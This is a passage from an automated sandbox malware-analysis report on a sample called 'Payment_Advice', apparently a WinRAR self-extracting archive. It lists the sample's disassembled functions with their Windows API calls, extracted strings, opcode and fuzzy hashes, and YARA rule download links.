                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                                    • API String ID: 0-56093855
                                                                                                    • Opcode ID: 0cf29257b9b412b9732d41ecbec7c99d16e73abc475dddaf1834233e1d4ff0cf
                                                                                                    • Instruction ID: c132dbc85ec00d623c753ea7e1a35dfca4cd4ac7721bd4a447d160d34ece730e
                                                                                                    • Opcode Fuzzy Hash: 0cf29257b9b412b9732d41ecbec7c99d16e73abc475dddaf1834233e1d4ff0cf
                                                                                                    • Instruction Fuzzy Hash: 21015279504245AFEB119F54FC48AEA7FB5F729358B100425F50593231C6719C98FBB0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00501316 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 0050E2E8: _swprintf.LIBCMT ref: 0050E30E
                                                                                                      • Part of subcall function 0050E2E8: _strlen.LIBCMT ref: 0050E32F
                                                                                                      • Part of subcall function 0050E2E8: SetDlgItemTextW.USER32(?,0053E274,?), ref: 0050E38F
                                                                                                      • Part of subcall function 0050E2E8: GetWindowRect.USER32(?,?), ref: 0050E3C9
                                                                                                      • Part of subcall function 0050E2E8: GetClientRect.USER32(?,?), ref: 0050E3D5
                                                                                                    • GetDlgItem.USER32(00000000,00003021), ref: 0050135A
                                                                                                    • SetWindowTextW.USER32(00000000,005335F4), ref: 00501370
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                                                                    • String ID: Q$0
                                                                                                    • API String ID: 2622349952-432977256
                                                                                                    • Opcode ID: bb08f2479de05c0410285cfcc35c3530a7f14691deff827fec48bdd3aa95a901
                                                                                                    • Instruction ID: a8a267e004c94637cddae091d2f111e6bc909b1909bc59a2fd67180912835c7d
                                                                                                    • Opcode Fuzzy Hash: bb08f2479de05c0410285cfcc35c3530a7f14691deff827fec48bdd3aa95a901
                                                                                                    • Instruction Fuzzy Hash: 48F08C3010478DABDF150F64C80EAEE3F98BB51344F048914FC48515E1CB74C994EA19
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00529A1E Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: __alldvrm$_strrchr
                                                                                                    • String ID:
                                                                                                    • API String ID: 1036877536-0
                                                                                                    • Opcode ID: 3257cbe3c23a9893bcf4e13c0b157f0aff40f0c1a093e58d5470b9d1dc85e048
                                                                                                    • Instruction ID: 8896ce8a8e6fd849653f16a96bef0b568418e79a19d4290354ebc3a5dfce6400
                                                                                                    • Opcode Fuzzy Hash: 3257cbe3c23a9893bcf4e13c0b157f0aff40f0c1a093e58d5470b9d1dc85e048
                                                                                                    • Instruction Fuzzy Hash: 3EA12472A047A69FEB258F28E8917AEBFE5FF56310F18456DE485AB3C1C2388D41C750
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0050A354 Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00507F69,?,?,?), ref: 0050A3FA
                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,00507F69,?), ref: 0050A43E
                                                                                                    • SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,00507F69,?,?,?,?,?,?,?), ref: 0050A4BF
                                                                                                    • CloseHandle.KERNEL32(?,?,?,00000800,?,00507F69,?,?,?,?,?,?,?,?,?,?), ref: 0050A4C6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$Create$CloseHandleTime
                                                                                                    • String ID:
                                                                                                    • API String ID: 2287278272-0
                                                                                                    • Opcode ID: 8a53c25a6b765b1b54e196b205bfbff567583fc795c85e500fe78aa4e5805393
                                                                                                    • Instruction ID: db14d71b1305a87834107a2e837c170ce715e18efa3831a3898aee93d83b9dd7
                                                                                                    • Opcode Fuzzy Hash: 8a53c25a6b765b1b54e196b205bfbff567583fc795c85e500fe78aa4e5805393
                                                                                                    • Instruction Fuzzy Hash: DA418E312483819AE721DF24DC49FEEBFE4AB95700F040D19B5E1971D1D6A49A489B53
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0052C988 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,2DE85006,005247C6,00000000,00000000,005257FB,?,005257FB,?,00000001,005247C6,2DE85006,00000001,005257FB,005257FB), ref: 0052C9D5
                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0052CA5E
                                                                                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0052CA70
                                                                                                    • __freea.LIBCMT ref: 0052CA79
                                                                                                      • Part of subcall function 00528E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00524286,?,0000015D,?,?,?,?,00525762,000000FF,00000000,?,?), ref: 00528E38
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                    • String ID:
                                                                                                    • API String ID: 2652629310-0
                                                                                                    • Opcode ID: cda667ab10ecd32b6adada963dc5d2fda0bc7cdd31cc2ff2e3e1f0ff7a75d713
                                                                                                    • Instruction ID: d9833289ebe3233326218c57d7fb7570c44f8c495a532507a4f202f8fcda085c
                                                                                                    • Opcode Fuzzy Hash: cda667ab10ecd32b6adada963dc5d2fda0bc7cdd31cc2ff2e3e1f0ff7a75d713
                                                                                                    • Instruction Fuzzy Hash: 9B319D72A0022AABDB24DF64EC45DBE7FA6FF42710B044268FC04E6291E735DD94DB90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0051A663 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetDC.USER32(00000000), ref: 0051A666
                                                                                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 0051A675
                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0051A683
                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 0051A691
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CapsDevice$Release
                                                                                                    • String ID:
                                                                                                    • API String ID: 1035833867-0
                                                                                                    • Opcode ID: 42780598523a67d365f93d84890cc3367b7baa9ba2ff38d6e737d7de54416e46
                                                                                                    • Instruction ID: 2176abc0d0250ecd7b51f5f913312e16c2efa444d7a93d99a319d5ade3402db3
                                                                                                    • Opcode Fuzzy Hash: 42780598523a67d365f93d84890cc3367b7baa9ba2ff38d6e737d7de54416e46
                                                                                                    • Instruction Fuzzy Hash: 94E01231E42721FBD7615B68BC0DBDF3E54AB26B66F010205FA059B2D0DBB4860C9BA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0051D06A Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 278COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcschr
                                                                                                    • String ID: .lnk$dQ
                                                                                                    • API String ID: 2691759472-3104787530
                                                                                                    • Opcode ID: 086d35efd9bda1bc94ddae3f608e8a8cf8b8b8ef80df1c8c25e83ca11a7f645c
                                                                                                    • Instruction ID: c6b34837a6be920e7de1b9abb3bb5573261228b5dfb1bce1ce54bc54db327a27
                                                                                                    • Opcode Fuzzy Hash: 086d35efd9bda1bc94ddae3f608e8a8cf8b8b8ef80df1c8c25e83ca11a7f645c
                                                                                                    • Instruction Fuzzy Hash: AFA1337690022AA6EF24DBA0CD49EFA77FCBF44304F0445A6B509E7181EE759AC5CB70
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0052B1B8 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • _free.LIBCMT ref: 0052B324
                                                                                                      • Part of subcall function 00529097: IsProcessorFeaturePresent.KERNEL32(00000017,00529086,00000000,00528D94,00000000,00000000,00000000,00000016,?,?,00529093,00000000,00000000,00000000,00000000,00000000), ref: 00529099
                                                                                                      • Part of subcall function 00529097: GetCurrentProcess.KERNEL32(C0000417,00528D94,00000000,?,00000003,00529868), ref: 005290BB
                                                                                                      • Part of subcall function 00529097: TerminateProcess.KERNEL32(00000000,?,00000003,00529868), ref: 005290C2
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                                                    • String ID: *?$.
                                                                                                    • API String ID: 2667617558-3972193922
                                                                                                    • Opcode ID: 871087a43f0bd1cbd1098384f5f5eb82fa4a5fd881eee7424b44ab4bf77dde44
                                                                                                    • Instruction ID: a02d09bcd0f45e47615551343f34fd8b59316032246e880ff0c86c4524cf36a8
                                                                                                    • Opcode Fuzzy Hash: 871087a43f0bd1cbd1098384f5f5eb82fa4a5fd881eee7424b44ab4bf77dde44
                                                                                                    • Instruction Fuzzy Hash: B3516F75E0022ADFEF14DFA8D881AADBBB5FF99310F244169E854A7380E7319A018B50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 005075DE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137timeCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 005075E3
                                                                                                      • Part of subcall function 005105DA: _wcslen.LIBCMT ref: 005105E0
                                                                                                      • Part of subcall function 0050A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0050A598
                                                                                                    • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0050777F
                                                                                                      • Part of subcall function 0050A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0050A325,?,?,?,0050A175,?,00000001,00000000,?,?), ref: 0050A501
                                                                                                      • Part of subcall function 0050A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0050A325,?,?,?,0050A175,?,00000001,00000000,?,?), ref: 0050A532
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$Attributes$CloseFindH_prologTime_wcslen
                                                                                                    • String ID: :
                                                                                                    • API String ID: 3226429890-336475711
                                                                                                    • Opcode ID: 21be456bff54555c9b23307bb12e946513264eeeac75c3ee5ad90de99de7fbdb
                                                                                                    • Instruction ID: 9732d5bb1a971f9b6bb1efc806ab0bcff97b213af883554915b36ad9f5c7fba9
                                                                                                    • Opcode Fuzzy Hash: 21be456bff54555c9b23307bb12e946513264eeeac75c3ee5ad90de99de7fbdb
                                                                                                    • Instruction Fuzzy Hash: B5415071901659A9EB25EB64CC59EEEBB7CFF85300F004096B60AA30D2DB746F85CF60
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0050B37A Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 127COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcschr
                                                                                                    • String ID: *
                                                                                                    • API String ID: 2691759472-163128923
                                                                                                    • Opcode ID: 88e0316d952a737de659b873b30e32db82b321067ca43ddceef709dfbde03f35
                                                                                                    • Instruction ID: 6eb7af81e5d3a59892f6f2ff5938e13e75e76219514755763e021da653776918
                                                                                                    • Opcode Fuzzy Hash: 88e0316d952a737de659b873b30e32db82b321067ca43ddceef709dfbde03f35
                                                                                                    • Instruction Fuzzy Hash: FE312622104302AAFE309E1499C6A7F7FEAFF91B10F25881EF984471C3E7668F419261
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0051B48E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen
                                                                                                    • String ID: }
                                                                                                    • API String ID: 176396367-4239843852
                                                                                                    • Opcode ID: acd62f3611627c9ad9b8522e53c80218149a12300aeb418b2572effd935d308d
                                                                                                    • Instruction ID: b3eea7c4f8045d34bced82bcb867d65d3e351d86522f12d8a5ab093b614dc9b9
                                                                                                    • Opcode Fuzzy Hash: acd62f3611627c9ad9b8522e53c80218149a12300aeb418b2572effd935d308d
                                                                                                    • Instruction Fuzzy Hash: DA21F6729043165AFB31EB64E849EABBBEDFF91754F05042AF540C3141F765DD8883A2
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0050F344 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 0050F2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0050F2E4
                                                                                                      • Part of subcall function 0050F2C5: GetProcAddress.KERNEL32(005481C8,CryptUnprotectMemory), ref: 0050F2F4
                                                                                                    • GetCurrentProcessId.KERNEL32(?,?,?,0050F33E), ref: 0050F3D2
                                                                                                    Strings
                                                                                                    • CryptProtectMemory failed, xrefs: 0050F389
                                                                                                    • CryptUnprotectMemory failed, xrefs: 0050F3CA
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$CurrentProcess
                                                                                                    • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                                                                    • API String ID: 2190909847-396321323
                                                                                                    • Opcode ID: 3d0e623631f3c06ffb75807a9a365b42eb84a12a13ba90048ec88f1e1a0a34ba
                                                                                                    • Instruction ID: daa9651beeb5e1b330ed277c4adce03b6207df1b88570a66ea3855916bfa645e
                                                                                                    • Opcode Fuzzy Hash: 3d0e623631f3c06ffb75807a9a365b42eb84a12a13ba90048ec88f1e1a0a34ba
                                                                                                    • Instruction Fuzzy Hash: 6B11263160062AABEF35AF20EC46AEE3F54FF50734B044526FC015B6D1DA30AD459790
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0050C058 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcschr
                                                                                                    • String ID: <9S$?*<>|"
                                                                                                    • API String ID: 2691759472-1328803747
                                                                                                    • Opcode ID: 590c7d167f94264fd64919f9407a584865630e384074c1a41a0d612516e33b63
                                                                                                    • Instruction ID: a1d84fe9fab17e5f76e5665d5d0fb7190184b48156dd3761dce1c8f62a4ed7fb
                                                                                                    • Opcode Fuzzy Hash: 590c7d167f94264fd64919f9407a584865630e384074c1a41a0d612516e33b63
                                                                                                    • Instruction Fuzzy Hash: 49F06D57A45702D5C7301F29A82573EBFE4FF97720F240A1EE5C58B2D2E6A18880C665
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0051DB4B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen
                                                                                                    • String ID: Software\WinRAR SFX$Q
                                                                                                    • API String ID: 176396367-2798703949
                                                                                                    • Opcode ID: ee373c934b37fa8eec34d7eecdde8ed3e1c4dcd21b64c0243870c709cfd11914
                                                                                                    • Instruction ID: 64f691925c22f617dd5d44e435a85570634e31ce1a2d62818cf9290a745d5976
                                                                                                    • Opcode Fuzzy Hash: ee373c934b37fa8eec34d7eecdde8ed3e1c4dcd21b64c0243870c709cfd11914
                                                                                                    • Instruction Fuzzy Hash: 27015A35540128BAEF229B95DC0EFDF7F7CFB553A8F000052B54AA50A0D7A48A8CDAA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

